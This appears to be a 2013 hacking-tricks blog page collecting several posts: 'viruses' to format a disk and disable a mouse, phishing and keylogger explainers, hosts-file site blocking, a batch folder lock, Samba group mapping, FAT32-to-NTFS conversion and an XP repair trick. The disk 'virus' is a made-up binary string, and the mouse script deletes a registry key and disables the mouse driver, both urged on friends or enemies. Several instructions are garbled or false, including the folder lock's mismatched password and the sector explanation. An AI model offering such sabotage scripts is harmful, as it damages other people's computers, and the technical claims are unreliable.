Sunday, September 29, 2013

Virus to Format Hard Disk !!!

Virus to Format Hard Disk !!!


                     Today i will show you how to make a virus to format Hard disk. You can send this file to your friend or enemy to format their Hard disk. But please dont try this on your own computer or else you will end up formatting your own computer.
  • Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000 
  • Save the file as Format.exe
  • You have created your virus. Enjoy !!! 

What is phishing?

What is phishing and how to be safe from phishing ?



    What is Phishing ?

                    Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing page could be saif as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail. Target of phishing are mostly social networking sites like facebook, orkut etc. Also Banks website to acquire credit card details,website like yahoo, gmail are also target of phishing.



    Example of Phishing scams:
  • Email asking you to login to your locked account to unlock it.
  • Email carrying a Link to sites like Facebook,yahoo etc and asking you to Login.
  • Emails containing some Information of your Interest and asking you to Login to Your Account.
   
     How to be safe from phishing ?
  • Never login to any of your account through link provided in the Email.
  • Go to real website dont click on any link posted anywhere. such as link posted on your facebook wall by friend or link provided in comments or link to ceratin website on any blog.
  • Check the URL of website before entering any sensitive information. Because the URL of phishing page is not same as the URL of  real one.
  • Real gmail page looks like gmail.com while phishing looks different somthing like gmail.anything.com

What Is Keylogger ?

What Is Keylogger And How To Be Safe From Keyloggers?


keyloggers
In this tutorial i am going to talk about the most use piece of software besides from RAT by hackers to observe your activities on your computer and that is keyloggerskeylogger is a software or hardware device which monitors each and every key typed by you on your keyboard. I am going to talk about different types of keylogger and how to be safe from keyloggers. So lets learn somthing about keyloggers.

 1. What is keylogger ?

You might have heard about keyloggers but really dont know what they are reading this article will clear your mind. A keylogger also know as keystroke logger is software or hardware device which monitors each and every key typed by you on your keyboard. You can not identify the presence of keylogger on your computer since it runs in background and also it is not listed in task manager or control panel. It can be used by parents to keep eye on their childrens or company owner to spy on their employes.

2. How it can harm you ?

In this section i will talk about how keylogger can harm you in different ways for example It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit card details, or any other activities you do on your computer.
  • Example: You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.

3. Types of  keyloggers 

There are two types of keylogger hardware keylogger and software keylogger. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind.

                              HARDWARE KEYLOGGER                                  
hardware keyloggers 

 SOFTWARE KEYLOGGER
 software keyloggers
                               

 4. How to Protect yourself from keyloggers ?

Keylogger  can be used by your enemy  to get sensitive information such as your Bank credit card details, or password of any social networking sites etc. In order to be safe keep following points in your mind.
  • Never use your online banking from cyber cafe. If you want to use then you can try this method. open notepad and type anything Then copy and paste each word that comes in your username or password.
  • You can even use above method to protect your facebook profile, yahoo or gmail id.
  • When you enter cyber cafe make sure that no hardware device is attached to keyboard wire. Its look something similar to above image.

How to block unblock websites ?

How to block unblock websites ?


  • Go to Start and then Run.
  • Type in this C:\WINDOWS\system32\drivers\etc
  • Now you will see file name Host open that in Notepad.
  • Below "127.0.0.1 localhost" add IP address of site to be blocked.
  • To unblock any site just reversed the process.
     
      EXAMPLE
     127.0.0.1 localhost
     69.171.224.14    (This will block Facebook)
     NOTE: For each site you block just add "1" to the IP (127.0.0.1)

Make a virus that disable Mouse

Make a virus that disable Mouse



               I had previously posted on making different batch files like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.
  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as  virus.bat
  • Done you just created your virus.

Password Protect Any Folder

Password Protect Any Folder Without Any Software


In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title folder lock
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== venki goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Wednesday, September 25, 2013

Administrators of a Samba Domain

How to create administrators of a samba domain








With a Samba server, we can make a DC (Domain Controler). Simplifying the meaning of DC, it’s a server where will be stored accounts for the network users. The Samba, is based on the Windows NT and because this, it has many features  of the NT server.

One of these features, is groups of users. The main groups of a NT domain are the following ones:

Nt Group
Description
RID (Relative Identifier)
Domain AdminsDomain administrators512
Domain UsersDomain Users513

When a computer join the domain, it’s created these ( and others ) groups. This make the users of these groups have the same privileges as in the domain. But in the Linux, no one of these groups have a corresponding until you say so. To do so,  you need specify which groups of the  Linux represent the NT groups (Samba).

All we need to do in is create groups to be maped with their respectives on the samba. We will create the groups “ntadmin” and “ntuser“.
groupadd ntadmin
groupadd ntuser

Now we need map these groups in the Samba. To do this, we will use the comand “net“.

net groupmap add ntgroup=”Domain Admins” unixgroup=ntadmin rid=512 type=d comment=”Administradores”
net groupmap add ntgroup=”Domain Users” unixgroup=ntuser rid=513 type=d comment=”Usuários”

We can create now, new users and add them in that group. This is done passing the -g parameter with “useradd“.
useradd -g group userr
Example: useradd -g ntadmin trufelli

If the user already exist, we can change the primary group with the command “usermod” and we need change this user group in samba with the “pdbeit“, we will specify the group in samba with theRID of the group.

usermod -g group user
Example: usermod -g ntadmin trufelli
pdbedit -r -G Group_RID -u User
Examplepdbedit -r -G 512 -u trufelli

All admin users will have access to all shares with admin privileges. To change this, we can add the following options in the share configs:
invalid users =  @ntadmin

With this parameter, any member of the group “ntadmin“  couldn’t access to that share.

Monday, September 23, 2013

CONVERT FAT32 TO NTFS FILE SYSTEM WITHOUT LOSING DATA

SIMPLE STEPS ON HOW  YOU CAN CONVERT FAT32 TO NTFS FILE SYSTEM WITHOUT LOSING DATA
 File system is the way in which files and data are named, organized and placed logically in a computer, so that it is easy to find and access them. It is also used on data storage devices such as floppy disks, hard disk, optical disk or flash memory storage devices to maintain the location of the files. Some file System allows multiple programs to update data in the same file at same time.
TYPES OF FILE SYSTEM
IT IS BASICALLY OF 3 TYPES:-
  1. Disk
  2. Network
  3. Special purpose
FAT32 (File Allocation Table) and NTFS (New Technology File System) are the types of Disk file System. FAT32 was used in DOS and Windows 98 but with the launch of Windows XP a new file system NTFS was introduced which is used widely because it provides high security and better performance.
NTFS vs FAT32
NTFS creates the sectors in counting of 4, Suppose File size is 18, it will create 5 sectors (4,4,4,4,2).It means that only 2 sectors will be lost. But in case of FAT32 it creates sector in counting of 16 so for file size 18, it will create two sectors (16,2) it means 14 sectors will be lost and this will effects your transfer rate. You can convert FAT32 to NTFS and vice versa. Here is the step by step tutorial to convert FAT32 to NTFS.
HOW DO YOU CONVERT FAT32 TO NTFS FILE SYSTEM WITHOUT LOOSING DATA
Open Window Explorer and memorize the drive letter of which you want to convert file system.
In search bar type CMD and right click on it, Select Run as Administrator.
Now Run “chkdsk G: /f” (without quotes) here G is the drive letter. This checks the drive for errors and fixes them automatically.
Run Convert G: /FS:NTFS
Wait for some time, then a message will display on the command prompt stating Conversion Complete
To verify, RIGHT CLICK on the drive and select PROPERTIES.

BLOCK A WEBSITE FROM YOUR PC

HOW TO MANUALLY BLOCK A WEBSITE FROM YOUR PC

Some of us don’t want our kids watching adult movies and some don’t want their kids clicking their blog ad to prevent ban. Most people have other reasons of blocking some certain sites from showing in their pc.
So on today, we are going to know how to block sites from our pc manually without stress. Note that if you block any site it can’t be opened by any browser except you reverse it and remember that this tutorial is very simple to comprehend.
For this trick to work we are going to edit the host file of our windows and we will use the Ip address “127.0.0.1 (i.e localhost)”.Whenever somebody tries to open the blocked website the user will be redirected to localhost.
1. If you’re running vista or windows 7, open your notepad as admin
2. Now click “file” and press “open” then go to C: \Windows\System32\Drivers\Etc and locate the file “hosts”.
3. When this hosts file is opened in Notepad, at the end of the file you will see something like “127.0.0.1 localhost”.
4. Under “127.0.0.1localhost” just add another website URL that you want to block. Example 127.0.0.1localhost 127.0.0.2 www.amazon.com 127.0.0.3 www.facebook.com
Now try to visit the site you just added with your browser and watch what happens.
Tip: Remember that you can always disable it by deleting the site you input.

Blue screen when using your window xp?

HOW TO REPAIR WINDOWS XP WITHOUT

 BOOTABLE CD:


window xp format
Have you ever got a blue screen when using your window xp? Or have your system off its self without you setting it to do so? Our system crash often when we are not taken good care of it, right? What causes system to crash are virus infested pc, pc that we don’t take care of, corrupt registry problem and many other elements. So when your system crash, the first thing that comes to our mind is using our bootable cd to format or repair our pc, but how can you repair it when you’re far away from home? In a short while we are going to learn how to repair how windows xp without using any external method like our bootable cd.
The code name for this process is called “Web Folders XP Repairing System”. *lol*

REPAIRING WINDOWS XP WITHOUT BOOTABLE CD

Before you start any process that deals with your system core, it is advisable to plug your pc to a power source. Now let’s assume you have already done that so let’s proceed…
1. First Click Start and go to Run.
2. In Run Type “webfldrs.msi” in the provided space and tap enter (without Quote)
3. A new window will pop up. Now what you will do is to select “Reinstall Mode”.
4. On the new interface that will pop out, tick marks on all the options and Click on OK.
Are you still with us? If you are still with us, let’s move to the final step shall we.
5. After clicking Ok, it will take few minutes to Repair your windows XP and when the process is done (completed), it will ask you to restart your System and after restarting your system, voila! Your system will be back to normal again. You’re now free from virus and corrupt registry, so the next time you’re using your system use it with care.
REMEMBER: This process works for windows xp only.

Saturday, September 21, 2013

EXCEL ALL FUNCTIONS

MS Excel

Alphabetical Listing of WS Functions

Miscellaneous Functions